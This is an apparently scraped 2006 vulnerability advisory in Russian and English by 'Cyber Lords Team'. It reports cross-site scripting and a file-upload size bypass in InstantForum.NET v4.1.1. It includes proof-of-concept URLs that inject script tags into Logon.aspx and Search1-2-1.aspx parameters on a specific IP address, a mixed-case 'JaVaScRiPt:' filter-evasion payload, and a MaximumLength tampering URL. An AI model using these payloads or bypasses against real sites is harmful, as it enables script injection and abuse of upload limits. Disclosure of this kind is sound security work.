Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11854
HistoryMar 19, 2006 - 12:00 a.m.

XSS in InstantForum.NET v4.1.1

2006-03-1900:00:00
vulners.com
15
JSON

Advisory: InstantForum.NET v4.1.1

Home Page: http://instantasp.co.uk/

Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting

Уязвимый скрипт/Vulnerable script: Logon.aspx, Search1-2-1.aspx,
InsertAttachments.aspx

http://83.138.140.178/eCitizen_InstantForum411/Logon.aspx?SessionID=enzzuy30eeuijq45itfom1qu"><script>alert()</script><"
http://83.138.140.178/eCitizen_InstantForum411/Search1-2-1.aspx?SessionID=enzzuy30eeuijq45itfom1qu&SortBy=1"><script>alert()</script><"&SortOrder=1
http://83.138.140.178/eCitizen_InstantForum411/Search1-2-1.aspx?SessionID=enzzuy30eeuijq45itfom1qu&SortBy=1&SortOrder=1"><script>alert()</script><"

Межсайтовый скриптинг при отправке сообщения, в полях личной
информации(Interests, Biography, Signature).
Изменив регистр символов, возможно обойти фильтрацию.

Пример:

<IMG SRC=JaVaScRiPt:alert('XSS')>

Уязвимость/Vulnerability:
Обход ограничений на размер загружаемого файла.
Достаточно изменить число передаваемое параметру "MaximumLength".

http://83.138.140.178/eCitizen_InstantForum411/Skins/eCitizen2006/Dialogs/InsertAttachments.aspx?Hash=30f12ea8-5621-41c8-bf6c-0a156q06a87b&amp;EditID=0&amp;Task=17&amp;MaximumLength=999999

Cyber Lords Team
www.cyberlords.net

JSON